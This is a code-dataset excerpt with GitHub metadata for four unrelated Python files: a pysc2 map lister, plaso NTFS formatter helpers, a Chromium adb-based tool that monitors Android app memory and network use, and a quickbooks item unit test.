text stringlengths 4 1.02M | meta dict |
|---|---|
"""Print the list of available maps according to the game."""
from absl import app
from pysc2 import run_configs
def main(unused_argv):
with run_configs.get().start(want_rgb=False) as controller:
available_maps = controller.available_maps()
print("\n")
print("Local map paths:")
for m in sorted(available_maps.local_map_paths):
print(" ", m)
print()
print("Battle.net maps:")
for m in sorted(available_maps.battlenet_map_names):
print(" ", m)
if __name__ == "__main__":
app.run(main)
| {
"content_hash": "85af6757eac6e08caece3e8f58b1ffb2",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 61,
"avg_line_length": 23.545454545454547,
"alnum_prop": 0.666023166023166,
"repo_name": "deepmind/pysc2",
"id": "babfaed0341ca400fa180385ac89c6ffc7851683",
"size": "1133",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pysc2/bin/battle_net_maps.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "733866"
},
{
"name": "Starlark",
"bytes": "42723"
}
],
"symlink_target": ""
} |
"""File system custom event formatter helpers."""
from plaso.formatters import interface
from plaso.formatters import manager
class NTFSFileReferenceFormatterHelper(interface.CustomEventFormatterHelper):
"""NTFS file reference formatter helper."""
IDENTIFIER = 'ntfs_file_reference'
def FormatEventValues(self, event_values):
"""Formats event values using the helper.
Args:
event_values (dict[str, object]): event values.
"""
file_reference = event_values.get('file_reference', None)
if file_reference:
event_values['file_reference'] = '{0:d}-{1:d}'.format(
file_reference & 0xffffffffffff, file_reference >> 48)
class NTFSParentFileReferenceFormatterHelper(
interface.CustomEventFormatterHelper):
"""NTFS parent file reference formatter helper."""
IDENTIFIER = 'ntfs_parent_file_reference'
def FormatEventValues(self, event_values):
"""Formats event values using the helper.
Args:
event_values (dict[str, object]): event values.
"""
parent_file_reference = event_values.get('parent_file_reference', None)
if parent_file_reference:
event_values['parent_file_reference'] = '{0:d}-{1:d}'.format(
parent_file_reference & 0xffffffffffff, parent_file_reference >> 48)
class NTFSPathHintsFormatterHelper(interface.CustomEventFormatterHelper):
"""NTFS path hints formatter helper."""
IDENTIFIER = 'ntfs_path_hints'
def FormatEventValues(self, event_values):
"""Formats event values using the helper.
Args:
event_values (dict[str, object]): event values.
"""
path_hints = event_values.get('path_hints', None)
if path_hints:
event_values['path_hints'] = ';'.join(path_hints)
manager.FormattersManager.RegisterEventFormatterHelpers([
NTFSFileReferenceFormatterHelper, NTFSParentFileReferenceFormatterHelper,
NTFSPathHintsFormatterHelper])
| {
"content_hash": "a01841279cb6e41f7060832eda78643c",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 78,
"avg_line_length": 31.55,
"alnum_prop": 0.716851558372953,
"repo_name": "kiddinn/plaso",
"id": "427e90126548dc1e5e83a79ee5ef51d4fd93dc59",
"size": "1917",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "plaso/formatters/file_system.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1047"
},
{
"name": "Makefile",
"bytes": "68"
},
{
"name": "PowerShell",
"bytes": "9560"
},
{
"name": "Python",
"bytes": "4878625"
},
{
"name": "Ruby",
"bytes": "926"
},
{
"name": "Shell",
"bytes": "26453"
}
],
"symlink_target": ""
} |
import argparse
import curses
import os
import re
import sys
import time
from operator import sub
_SRC_PATH = os.path.abspath(os.path.join(
os.path.dirname(__file__), '..', '..'))
sys.path.append(os.path.join(_SRC_PATH, 'third_party', 'catapult', 'devil'))
from devil.android import device_errors
from devil.android import device_utils
sys.path.append(os.path.join(_SRC_PATH, 'build', 'android'))
import devil_chromium
class Utils(object):
"""A helper class to hold various utility methods."""
@staticmethod
def FindLines(haystack, needle):
"""A helper method to find lines in |haystack| that contain the string
|needle|."""
return [ hay for hay in haystack if needle in hay ]
class Validator(object):
"""A helper class with validation methods for argparse."""
@staticmethod
def ValidatePath(path):
"""An argparse validation method to make sure a file path is writable."""
if os.path.exists(path):
return path
elif os.access(os.path.dirname(path), os.W_OK):
return path
raise argparse.ArgumentTypeError("%s is an invalid file path" % path)
@staticmethod
def ValidatePdfPath(path):
"""An argparse validation method to make sure a pdf file path is writable.
Validates a file path to make sure it is writable and also appends '.pdf' if
necessary."""
if os.path.splitext(path)[-1].lower() != 'pdf':
path = path + '.pdf'
return Validator.ValidatePath(path)
@staticmethod
def ValidateNonNegativeNumber(val):
"""An argparse validation method to make sure a number is not negative."""
ival = int(val)
if ival < 0:
raise argparse.ArgumentTypeError("%s is a negative integer" % val)
return ival
class Timer(object):
"""A helper class to track timestamps based on when this program was
started"""
starting_time = time.time()
@staticmethod
def GetTimestamp():
"""A helper method to return the time (in seconds) since this program was
started."""
return time.time() - Timer.starting_time
class DeviceHelper(object):
"""A helper class with various generic device interaction methods."""
@staticmethod
def __GetUserIdForProcessName(adb, process_name):
"""Returns the userId of the application associated by |pid| or None if
not found."""
try:
process_name = process_name.split(':')[0]
cmd = ['dumpsys', 'package', process_name]
user_id_lines = adb.RunShellCommand(cmd, large_output=True)
user_id_lines = Utils.FindLines(user_id_lines, 'userId=')
if not user_id_lines:
return None
columns = re.split('\s+|=', user_id_lines[0].strip())
if len(columns) >= 2:
return columns[1]
except device_errors.AdbShellCommandFailedError:
pass
return None
@staticmethod
def GetDeviceModel(adb):
"""Returns the model of the device with the |adb| connection."""
return adb.GetProp('ro.product.model').strip()
@staticmethod
def GetDeviceToTrack(preset=None):
"""Returns a device serial to connect to. If |preset| is specified it will
return |preset| if it is connected and |None| otherwise. If |preset| is not
specified it will return the first connected device."""
devices = [d.adb.GetDeviceSerial()
for d in device_utils.DeviceUtils.HealthyDevices()]
if not devices:
return None
if preset:
return preset if preset in devices else None
return devices[0]
@staticmethod
def GetPidsToTrack(adb, default_pid=None, process_filter=None):
"""Returns a list of tuples of (userid, pids, process name) based on the
input arguments. If |default_pid| is specified it will return that pid if
it exists. If |process_filter| is specified it will return the pids of
processes with that string in the name. If both are specified it will
intersect the two. The returned result is sorted based on userid."""
pids = []
try:
pid_lines = adb.RunShellCommand(['ps'], large_output=True)
if default_pid:
pid_lines = Utils.FindLines(pid_lines, str(default_pid))
if process_filter:
pid_lines = Utils.FindLines(pid_lines, process_filter)
for line in pid_lines:
data = re.split('\s+', line.strip())
pid = data[1]
name = data[-1]
# Confirm that the pid and name match. Using a regular grep isn't
# reliable when doing it on the whole 'ps' input line.
pid_matches = not default_pid or pid == str(default_pid)
name_matches = not process_filter or name.find(process_filter) != -1
if pid_matches and name_matches:
userid = DeviceHelper.__GetUserIdForProcessName(adb, name)
pids.append((userid, pid, name))
except device_errors.AdbShellCommandFailedError:
pass
return sorted(pids, key=lambda tup: tup[0])
class NetworkHelper(object):
"""A helper class to query basic network usage of an application."""
@staticmethod
def QueryNetwork(adb, userid):
"""Queries the device for network information about the application with a
user id of |userid|. It will return a list of values:
[ Download Background, Upload Background, Download Foreground, Upload
Foreground ]. If the application is not found it will return
[ 0, 0, 0, 0 ]."""
results = [0, 0, 0, 0]
if not userid:
return results
try:
# Parsing indices for scanning a row from /proc/net/xt_qtaguid/stats.
# The application id
userid_idx = 3
# Whether or not the transmission happened with the application in the
# background (0) or foreground (1).
bg_or_fg_idx = 4
# The number of bytes received.
rx_idx = 5
# The number of bytes sent.
tx_idx = 7
net_lines = adb.ReadFile('/proc/net/xt_qtaguid/stats').splitlines()
net_lines = Utils.FindLines(net_lines, userid)
for line in net_lines:
data = re.split('\s+', line.strip())
if data[userid_idx] != userid:
continue
dst_idx_offset = None
if data[bg_or_fg_idx] == '0':
dst_idx_offset = 0
elif data[bg_or_fg_idx] == '1':
dst_idx_offset = 2
if dst_idx_offset is None:
continue
results[dst_idx_offset] = round(float(data[rx_idx]) / 1000.0, 2)
results[dst_idx_offset + 1] = round(float(data[tx_idx]) / 1000.0, 2)
except device_errors.AdbShellCommandFailedError:
pass
return results
class MemoryHelper(object):
"""A helper class to query basic memory usage of a process."""
@staticmethod
def QueryMemory(adb, pid):
"""Queries the device for memory information about the process with a pid of
|pid|. It will query Native, Dalvik, and Pss memory of the process. It
returns a list of values: [ Native, Pss, Dalvik ]. If the process is not
found it will return [ 0, 0, 0 ]."""
results = [0, 0, 0]
mem_lines = adb.RunShellCommand(['dumpsys', 'meminfo', pid])
for line in mem_lines:
match = re.split('\s+', line.strip())
# Skip data after the 'App Summary' line. This is to fix builds where
# they have more entries that might match the other conditions.
if len(match) >= 2 and match[0] == 'App' and match[1] == 'Summary':
break
result_idx = None
query_idx = None
if match[0] == 'Native' and match[1] == 'Heap':
result_idx = 0
query_idx = -2
elif match[0] == 'Dalvik' and match[1] == 'Heap':
result_idx = 2
query_idx = -2
elif match[0] == 'TOTAL':
result_idx = 1
query_idx = 1
# If we already have a result, skip it and don't overwrite the data.
if result_idx is not None and results[result_idx] != 0:
continue
if result_idx is not None and query_idx is not None:
results[result_idx] = round(float(match[query_idx]) / 1000.0, 2)
return results
class GraphicsHelper(object):
"""A helper class to query basic graphics memory usage of a process."""
# TODO(dtrainor): Find a generic way to query/fall back for other devices.
# Is showmap consistently reliable?
__NV_MAP_MODELS = ['Xoom']
__NV_MAP_FILE_LOCATIONS = ['/d/nvmap/generic-0/clients',
'/d/nvmap/iovmm/clients']
__SHOWMAP_MODELS = ['Nexus S',
'Nexus S 4G',
'Galaxy Nexus',
'Nexus 4',
'Nexus 5',
'Nexus 7']
__SHOWMAP_KEY_MATCHES = ['/dev/pvrsrvkm',
'/dev/kgsl-3d0']
@staticmethod
def __QueryShowmap(adb, pid):
"""Attempts to query graphics memory via the 'showmap' command. It will
look for |self.__SHOWMAP_KEY_MATCHES| entries to try to find one that
represents the graphics memory usage. Will return this as a single entry
array of [ Graphics ]. If not found, will return [ 0 ]."""
try:
mem_lines = adb.RunShellCommand(['showmap', '-t', pid])
for line in mem_lines:
match = re.split('[ ]+', line.strip())
if match[-1] in GraphicsHelper.__SHOWMAP_KEY_MATCHES:
return [ round(float(match[2]) / 1000.0, 2) ]
except device_errors.AdbShellCommandFailedError:
pass
return [ 0 ]
@staticmethod
def __NvMapPath(adb):
"""Attempts to find a valid NV Map file on the device. It will look for a
file in |self.__NV_MAP_FILE_LOCATIONS| and see if one exists. If so, it
will return it."""
for nv_file in GraphicsHelper.__NV_MAP_FILE_LOCATIONS:
if adb.PathExists(nv_file):
return nv_file
return None
@staticmethod
def __QueryNvMap(adb, pid):
"""Attempts to query graphics memory via the NV file map method. It will
find a possible NV Map file from |self.__NvMapPath| and try to parse the
graphics memory from it. Will return this as a single entry array of
[ Graphics ]. If not found, will return [ 0 ]."""
nv_file = GraphicsHelper.__NvMapPath(adb)
if nv_file:
mem_lines = adb.ReadFile(nv_file).splitlines()
for line in mem_lines:
match = re.split(' +', line.strip())
if match[2] == pid:
return [ round(float(match[3]) / 1000000.0, 2) ]
return [ 0 ]
@staticmethod
def QueryVideoMemory(adb, pid):
"""Queries the device for graphics memory information about the process with
a pid of |pid|. Not all devices are currently supported. If possible, this
will return a single entry array of [ Graphics ]. Otherwise it will return
[ 0 ].
Please see |self.__NV_MAP_MODELS| and |self.__SHOWMAP_MODELS|
to see if the device is supported. For new devices, see if they can be
supported by existing methods and add their entry appropriately. Also,
please add any new way of querying graphics memory as they become
available."""
model = DeviceHelper.GetDeviceModel(adb)
if model in GraphicsHelper.__NV_MAP_MODELS:
return GraphicsHelper.__QueryNvMap(adb, pid)
elif model in GraphicsHelper.__SHOWMAP_MODELS:
return GraphicsHelper.__QueryShowmap(adb, pid)
return [ 0 ]
class DeviceSnapshot(object):
"""A class holding a snapshot of memory and network usage for various pids
that are being tracked. If |show_mem| is True, this will track memory usage.
If |show_net| is True, this will track network usage.
Attributes:
pids: A list of tuples (userid, pid, process name) that should be
tracked.
memory: A map of entries of pid => memory consumption array. Right now
the indices are [ Native, Pss, Dalvik, Graphics ].
network: A map of entries of userid => network consumption array. Right
now the indices are [ Download Background, Upload Background,
Download Foreground, Upload Foreground ].
timestamp: The amount of time (in seconds) between when this program started
and this snapshot was taken.
"""
def __init__(self, adb, pids, show_mem, show_net):
"""Creates an instances of a DeviceSnapshot with an |adb| device connection
and a list of (pid, process name) tuples."""
super(DeviceSnapshot, self).__init__()
self.pids = pids
self.memory = {}
self.network = {}
self.timestamp = Timer.GetTimestamp()
for (userid, pid, name) in pids:
if show_mem:
self.memory[pid] = self.__QueryMemoryForPid(adb, pid)
if show_net and userid not in self.network:
self.network[userid] = NetworkHelper.QueryNetwork(adb, userid)
@staticmethod
def __QueryMemoryForPid(adb, pid):
"""Queries the |adb| device for memory information about |pid|. This will
return a list of memory values that map to [ Native, Pss, Dalvik,
Graphics ]."""
results = MemoryHelper.QueryMemory(adb, pid)
results.extend(GraphicsHelper.QueryVideoMemory(adb, pid))
return results
def __GetProcessNames(self):
"""Returns a list of all of the process names tracked by this snapshot."""
return [tuple[2] for tuple in self.pids]
def HasResults(self):
"""Whether or not this snapshot was tracking any processes."""
return self.pids
def GetPidInfo(self):
"""Returns a list of (userid, pid, process name) tuples that are being
tracked in this snapshot."""
return self.pids
def GetNameForPid(self, search_pid):
"""Returns the process name of a tracked |search_pid|. This only works if
|search_pid| is tracked by this snapshot."""
for (userid, pid, name) in self.pids:
if pid == search_pid:
return name
return None
def GetUserIdForPid(self, search_pid):
"""Returns the application userId for an associated |pid|. This only works
if |search_pid| is tracked by this snapshot and the application userId is
queryable."""
for (userid, pid, name) in self.pids:
if pid == search_pid:
return userid
return None
def IsFirstPidForUserId(self, search_pid):
"""Returns whether or not |search_pid| is the first pid in the |pids| with
the associated application userId. This is used to determine if network
statistics should be shown for this pid or if they have already been shown
for a pid associated with this application."""
prev_userid = None
for idx, (userid, pid, name) in enumerate(self.pids):
if pid == search_pid:
return prev_userid != userid
prev_userid = userid
return False
def GetMemoryResults(self, pid):
"""Returns a list of entries about the memory usage of the process specified
by |pid|. This will be of the format [ Native, Pss, Dalvik, Graphics ]."""
if pid in self.memory:
return self.memory[pid]
return None
def GetNetworkResults(self, userid):
"""Returns a list of entries about the network usage of the application
specified by |userid|. This will be of the format [ Download Background,
Upload Background, Download Foreground, Upload Foreground ]."""
if userid in self.network:
return self.network[userid]
return None
def GetLongestNameLength(self):
"""Returns the length of the longest process name tracked by this
snapshot."""
return len(max(self.__GetProcessNames(), key=len))
def GetTimestamp(self):
"""Returns the time since program start that this snapshot was taken."""
return self.timestamp
class OutputBeautifier(object):
"""A helper class to beautify the memory output to various destinations.
Attributes:
can_color: Whether or not the output should include ASCII color codes to
make it look nicer. Default is |True|. This is disabled when
writing to a file or a graph.
overwrite: Whether or not the output should overwrite the previous output.
Default is |True|. This is disabled when writing to a file or a
graph.
"""
__MEMORY_COLUMN_TITLES = ['Native',
'Pss',
'Dalvik',
'Graphics']
__NETWORK_COLUMN_TITLES = ['Bg Rx',
'Bg Tx',
'Fg Rx',
'Fg Tx']
__TERMINAL_COLORS = {'ENDC': 0,
'BOLD': 1,
'GREY30': 90,
'RED': 91,
'DARK_YELLOW': 33,
'GREEN': 92}
def __init__(self, can_color=True, overwrite=True):
"""Creates an instance of an OutputBeautifier."""
super(OutputBeautifier, self).__init__()
self.can_color = can_color
self.overwrite = overwrite
self.lines_printed = 0
self.printed_header = False
@staticmethod
def __FindPidsForSnapshotList(snapshots):
"""Find the set of unique pids across all every snapshot in |snapshots|."""
pids = set()
for snapshot in snapshots:
for (userid, pid, name) in snapshot.GetPidInfo():
pids.add((userid, pid, name))
return pids
@staticmethod
def __TermCode(num):
"""Escapes a terminal code. See |self.__TERMINAL_COLORS| for a list of some
terminal codes that are used by this program."""
return '\033[%sm' % num
@staticmethod
def __PadString(string, length, left_align):
"""Pads |string| to at least |length| with spaces. Depending on
|left_align| the padding will appear at either the left or the right of the
original string."""
return (('%' if left_align else '%-') + str(length) + 's') % string
@staticmethod
def __GetDiffColor(delta):
"""Returns a color based on |delta|. Used to color the deltas between
different snapshots."""
if not delta or delta == 0.0:
return 'GREY30'
elif delta < 0:
return 'GREEN'
elif delta > 0:
return 'RED'
@staticmethod
def __CleanRound(val, precision):
"""Round |val| to |precision|. If |precision| is 0, completely remove the
decimal point."""
return int(val) if precision == 0 else round(float(val), precision)
def __ColorString(self, string, color):
"""Colors |string| based on |color|. |color| must be in
|self.__TERMINAL_COLORS|. Returns the colored string or the original
string if |self.can_color| is |False| or the |color| is invalid."""
if not self.can_color or not color or not self.__TERMINAL_COLORS[color]:
return string
return '%s%s%s' % (
self.__TermCode(self.__TERMINAL_COLORS[color]),
string,
self.__TermCode(self.__TERMINAL_COLORS['ENDC']))
def __PadAndColor(self, string, length, left_align, color):
"""A helper method to both pad and color the string. See
|self.__ColorString| and |self.__PadString|."""
return self.__ColorString(
self.__PadString(string, length, left_align), color)
def __OutputLine(self, line):
"""Writes a line to the screen. This also tracks how many times this method
was called so that the screen can be cleared properly if |self.overwrite| is
|True|."""
sys.stdout.write(line + '\n')
if self.overwrite:
self.lines_printed += 1
def __ClearScreen(self):
"""Clears the screen based on the number of times |self.__OutputLine| was
called."""
if self.lines_printed == 0 or not self.overwrite:
return
key_term_up = curses.tparm(curses.tigetstr('cuu1'))
key_term_clear_eol = curses.tparm(curses.tigetstr('el'))
key_term_go_to_bol = curses.tparm(curses.tigetstr('cr'))
sys.stdout.write(key_term_go_to_bol)
sys.stdout.write(key_term_clear_eol)
for i in range(self.lines_printed):
sys.stdout.write(key_term_up)
sys.stdout.write(key_term_clear_eol)
self.lines_printed = 0
def __PrintPidLabelHeader(self, snapshot):
"""Returns a header string with columns Pid and Name."""
if not snapshot or not snapshot.HasResults():
return
name_length = max(8, snapshot.GetLongestNameLength())
header = self.__PadString('Pid', 8, True) + ' '
header += self.__PadString('Name', name_length, False)
header = self.__ColorString(header, 'BOLD')
return header
def __PrintTimestampHeader(self):
"""Returns a header string with a Timestamp column."""
header = self.__PadString('Timestamp', 8, False)
header = self.__ColorString(header, 'BOLD')
return header
def __PrintMemoryStatsHeader(self):
"""Returns a header string for memory usage statistics."""
headers = ''
for header in self.__MEMORY_COLUMN_TITLES:
headers += self.__PadString(header, 8, True) + ' '
headers += self.__PadString('(mB)', 8, False)
return self.__ColorString(headers, 'BOLD')
def __PrintNetworkStatsHeader(self):
"""Returns a header string for network usage statistics."""
headers = ''
for header in self.__NETWORK_COLUMN_TITLES:
headers += self.__PadString(header, 8, True) + ' '
headers += self.__PadString('(kB)', 8, False)
return self.__ColorString(headers, 'BOLD')
def __PrintTrailingHeader(self, snapshot):
"""Returns a header string for the header trailer (includes timestamp)."""
if not snapshot or not snapshot.HasResults():
return
header = '(' + str(round(snapshot.GetTimestamp(), 2)) + 's)'
return self.__ColorString(header, 'BOLD')
def __PrintArrayWithDeltas(self, results, old_results, precision=2):
"""Helper method to return a string of statistics with their deltas. This
takes two arrays and prints out "current (current - old)" for all entries in
the arrays."""
if not results:
return
deltas = [0] * len(results)
if old_results:
assert len(old_results) == len(results)
deltas = map(sub, results, old_results)
output = ''
for idx, val in enumerate(results):
round_val = self.__CleanRound(val, precision)
round_delta = self.__CleanRound(deltas[idx], precision)
output += self.__PadString(str(round_val), 8, True) + ' '
output += self.__PadAndColor('(' + str(round_delta) + ')', 8, False,
self.__GetDiffColor(deltas[idx]))
return output
def __PrintPidLabelStats(self, pid, snapshot):
"""Returns a string that includes the columns pid and process name for
the specified |pid|. This lines up with the associated header."""
if not snapshot or not snapshot.HasResults():
return
name_length = max(8, snapshot.GetLongestNameLength())
name = snapshot.GetNameForPid(pid)
output = self.__PadAndColor(pid, 8, True, 'DARK_YELLOW') + ' '
output += self.__PadAndColor(name, name_length, False, None)
return output
def __PrintTimestampStats(self, snapshot):
"""Returns a string that includes the timestamp of the |snapshot|. This
lines up with the associated header."""
if not snapshot or not snapshot.HasResults():
return
timestamp_length = max(8, len("Timestamp"))
timestamp = round(snapshot.GetTimestamp(), 2)
output = self.__PadString(str(timestamp), timestamp_length, True)
return output
def __PrintMemoryStats(self, pid, snapshot, prev_snapshot):
"""Returns a string that includes memory statistics of the |snapshot|. This
lines up with the associated header."""
if not snapshot or not snapshot.HasResults():
return
results = snapshot.GetMemoryResults(pid)
if not results:
return
old_results = prev_snapshot.GetMemoryResults(pid) if prev_snapshot else None
return self.__PrintArrayWithDeltas(results, old_results, 2)
def __PrintNetworkStats(self, userid, snapshot, prev_snapshot):
"""Returns a string that includes network statistics of the |snapshot|. This
lines up with the associated header."""
if not snapshot or not snapshot.HasResults():
return
results = snapshot.GetNetworkResults(userid)
if not results:
return
old_results = None
if prev_snapshot:
old_results = prev_snapshot.GetNetworkResults(userid)
return self.__PrintArrayWithDeltas(results, old_results, 0)
def __PrintNulledNetworkStats(self):
"""Returns a string that includes empty network statistics. This lines up
with the associated header. This is used when showing statistics for pids
that share the same application userId. Network statistics should only be
shown once for each application userId."""
stats = ''
for title in self.__NETWORK_COLUMN_TITLES:
stats += self.__PadString('-', 8, True) + ' '
stats += self.__PadString('', 8, True)
return stats
def __PrintHeaderHelper(self,
snapshot,
show_labels,
show_timestamp,
show_mem,
show_net,
show_trailer):
"""Helper method to concat various header entries together into one header.
This will line up with a entry built by __PrintStatsHelper if the same
values are passed to it."""
titles = []
if show_labels:
titles.append(self.__PrintPidLabelHeader(snapshot))
if show_timestamp:
titles.append(self.__PrintTimestampHeader())
if show_mem:
titles.append(self.__PrintMemoryStatsHeader())
if show_net:
titles.append(self.__PrintNetworkStatsHeader())
if show_trailer:
titles.append(self.__PrintTrailingHeader(snapshot))
return ' '.join(titles)
def __PrintStatsHelper(self,
pid,
snapshot,
prev_snapshot,
show_labels,
show_timestamp,
show_mem,
show_net):
"""Helper method to concat various stats entries together into one line.
This will line up with a header built by __PrintHeaderHelper if the same
values are passed to it."""
stats = []
if show_labels:
stats.append(self.__PrintPidLabelStats(pid, snapshot))
if show_timestamp:
stats.append(self.__PrintTimestampStats(snapshot))
if show_mem:
stats.append(self.__PrintMemoryStats(pid, snapshot, prev_snapshot))
if show_net:
userid = snapshot.GetUserIdForPid(pid)
show_userid = snapshot.IsFirstPidForUserId(pid)
if userid and show_userid:
stats.append(self.__PrintNetworkStats(userid, snapshot, prev_snapshot))
else:
stats.append(self.__PrintNulledNetworkStats())
return ' '.join(stats)
def PrettyPrint(self, snapshot, prev_snapshot, show_mem=True, show_net=True):
"""Prints |snapshot| to the console. This will show memory and/or network
deltas between |snapshot| and |prev_snapshot|. This will also either color
or overwrite the previous entries based on |self.can_color| and
|self.overwrite|. If |show_mem| is True, this will attempt to show memory
statistics. If |show_net| is True, this will attempt to show network
statistics."""
self.__ClearScreen()
if not snapshot or not snapshot.HasResults():
self.__OutputLine("No results...")
return
# Output Format
show_label = True
show_timestamp = False
show_trailer = True
self.__OutputLine(self.__PrintHeaderHelper(snapshot,
show_label,
show_timestamp,
show_mem,
show_net,
show_trailer))
for (userid, pid, name) in snapshot.GetPidInfo():
self.__OutputLine(self.__PrintStatsHelper(pid,
snapshot,
prev_snapshot,
show_label,
show_timestamp,
show_mem,
show_net))
def PrettyFile(self,
file_path,
snapshots,
diff_against_start,
show_mem=True,
show_net=True):
"""Writes |snapshots| (a list of DeviceSnapshots) to |file_path|.
|diff_against_start| determines whether or not the snapshot deltas are
between the first entry and all entries or each previous entry. This output
will not follow |self.can_color| or |self.overwrite|. If |show_mem| is
True, this will attempt to show memory statistics. If |show_net| is True,
this will attempt to show network statistics."""
if not file_path or not snapshots:
return
# Output Format
show_label = False
show_timestamp = True
show_trailer = False
pids = self.__FindPidsForSnapshotList(snapshots)
# Disable special output formatting for file writing.
can_color = self.can_color
self.can_color = False
with open(file_path, 'w') as out:
for (userid, pid, name) in pids:
out.write(name + ' (' + str(pid) + '):\n')
out.write(self.__PrintHeaderHelper(None,
show_label,
show_timestamp,
show_mem,
show_net,
show_trailer))
out.write('\n')
prev_snapshot = None
for snapshot in snapshots:
has_mem = show_mem and snapshot.GetMemoryResults(pid) is not None
has_net = show_net and snapshot.GetNetworkResults(userid) is not None
if not has_mem and not has_net:
continue
out.write(self.__PrintStatsHelper(pid,
snapshot,
prev_snapshot,
show_label,
show_timestamp,
show_mem,
show_net))
out.write('\n')
if not prev_snapshot or not diff_against_start:
prev_snapshot = snapshot
out.write('\n\n')
# Restore special output formatting.
self.can_color = can_color
def PrettyGraph(self, file_path, snapshots):
"""Creates a pdf graph of |snapshots| (a list of DeviceSnapshots) at
|file_path|. This currently only shows memory stats and no network
stats."""
# Import these here so the rest of the functionality doesn't rely on
# matplotlib
from matplotlib import pyplot
from matplotlib.backends.backend_pdf import PdfPages
if not file_path or not snapshots:
return
pids = self.__FindPidsForSnapshotList(snapshots)
pp = PdfPages(file_path)
for (userid, pid, name) in pids:
figure = pyplot.figure()
ax = figure.add_subplot(1, 1, 1)
ax.set_xlabel('Time (s)')
ax.set_ylabel('MB')
ax.set_title(name + ' (' + pid + ')')
mem_list = [[] for x in range(len(self.__MEMORY_COLUMN_TITLES))]
timestamps = []
for snapshot in snapshots:
results = snapshot.GetMemoryResults(pid)
if not results:
continue
timestamps.append(round(snapshot.GetTimestamp(), 2))
assert len(results) == len(self.__MEMORY_COLUMN_TITLES)
for idx, result in enumerate(results):
mem_list[idx].append(result)
colors = []
for data in mem_list:
colors.append(ax.plot(timestamps, data)[0])
for i in xrange(len(timestamps)):
ax.annotate(data[i], xy=(timestamps[i], data[i]))
figure.legend(colors, self.__MEMORY_COLUMN_TITLES)
pp.savefig()
pp.close()
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--process',
dest='procname',
help="A (sub)string to match against process names.")
parser.add_argument('-p',
'--pid',
dest='pid',
type=Validator.ValidateNonNegativeNumber,
help='Which pid to scan for.')
parser.add_argument('-d',
'--device',
dest='device',
help='Device serial to scan.')
parser.add_argument('-t',
'--timelimit',
dest='timelimit',
type=Validator.ValidateNonNegativeNumber,
help='How long to track memory in seconds.')
parser.add_argument('-f',
'--frequency',
dest='frequency',
default=0,
type=Validator.ValidateNonNegativeNumber,
help='How often to poll in seconds.')
parser.add_argument('-s',
'--diff-against-start',
dest='diff_against_start',
action='store_true',
help='Whether or not to always compare against the'
' original memory values for deltas.')
parser.add_argument('-b',
'--boring-output',
dest='dull_output',
action='store_true',
help='Whether or not to dull down the output.')
parser.add_argument('-k',
'--keep-results',
dest='no_overwrite',
action='store_true',
help='Keeps printing the results in a list instead of'
' overwriting the previous values.')
parser.add_argument('-g',
'--graph-file',
dest='graph_file',
type=Validator.ValidatePdfPath,
help='PDF file to save graph of memory stats to.')
parser.add_argument('-o',
'--text-file',
dest='text_file',
type=Validator.ValidatePath,
help='File to save memory tracking stats to.')
parser.add_argument('-m',
'--memory',
dest='show_mem',
action='store_true',
help='Whether or not to show memory stats. True by'
' default unless --n is specified.')
parser.add_argument('-n',
'--net',
dest='show_net',
action='store_true',
help='Whether or not to show network stats. False by'
' default.')
args = parser.parse_args()
# Add a basic filter to make sure we search for something.
if not args.procname and not args.pid:
args.procname = 'chrome'
# Make sure we show memory stats if nothing was specifically requested.
if not args.show_net and not args.show_mem:
args.show_mem = True
devil_chromium.Initialize()
curses.setupterm()
printer = OutputBeautifier(not args.dull_output, not args.no_overwrite)
sys.stdout.write("Running... Hold CTRL-C to stop (or specify timeout).\n")
try:
last_time = time.time()
adb = None
old_snapshot = None
snapshots = []
while not args.timelimit or Timer.GetTimestamp() < float(args.timelimit):
# Check if we need to track another device
device = DeviceHelper.GetDeviceToTrack(args.device)
if not device:
adb = None
elif not adb or device != str(adb):
#adb = adb_wrapper.AdbWrapper(device)
adb = device_utils.DeviceUtils(device)
old_snapshot = None
snapshots = []
try:
adb.EnableRoot()
except device_errors.CommandFailedError:
sys.stderr.write('Unable to run adb as root.\n')
sys.exit(1)
# Grab a snapshot if we have a device
snapshot = None
if adb:
pids = DeviceHelper.GetPidsToTrack(adb, args.pid, args.procname)
snapshot = None
if pids:
snapshot = DeviceSnapshot(adb, pids, args.show_mem, args.show_net)
if snapshot and snapshot.HasResults():
snapshots.append(snapshot)
printer.PrettyPrint(snapshot, old_snapshot, args.show_mem, args.show_net)
# Transfer state for the next iteration and sleep
delay = max(1, args.frequency)
if snapshot:
delay = max(0, args.frequency - (time.time() - last_time))
time.sleep(delay)
last_time = time.time()
if not old_snapshot or not args.diff_against_start:
old_snapshot = snapshot
except KeyboardInterrupt:
pass
if args.graph_file:
printer.PrettyGraph(args.graph_file, snapshots)
if args.text_file:
printer.PrettyFile(args.text_file,
snapshots,
args.diff_against_start,
args.show_mem,
args.show_net)
if __name__ == '__main__':
sys.exit(main(sys.argv))
| {
"content_hash": "0e4a719a99f71ebb56278d2b984d32cc",
"timestamp": "",
"source": "github",
"line_count": 1005,
"max_line_length": 80,
"avg_line_length": 36.67860696517413,
"alnum_prop": 0.6070750366230807,
"repo_name": "Samsung/ChromiumGStreamerBackend",
"id": "032e847303504674763be890e1955c764b2772e9",
"size": "37098",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "tools/android/appstats.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
import unittest
from quickbooks.objects.item import Item
class ItemTests(unittest.TestCase):
def test_unicode(self):
item = Item()
item.Name = "test"
self.assertEquals(unicode(item), "test")
| {
"content_hash": "2d5b9c64df23f503fa013b80d61a7540",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 48,
"avg_line_length": 20.272727272727273,
"alnum_prop": 0.6636771300448431,
"repo_name": "ferdiaz/python-quickbooks",
"id": "841aa189e3c0c0f09e9a3e461f47d7faa00ef85c",
"size": "223",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/unit/objects/test_item.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "164"
},
{
"name": "Python",
"bytes": "92199"
}
],
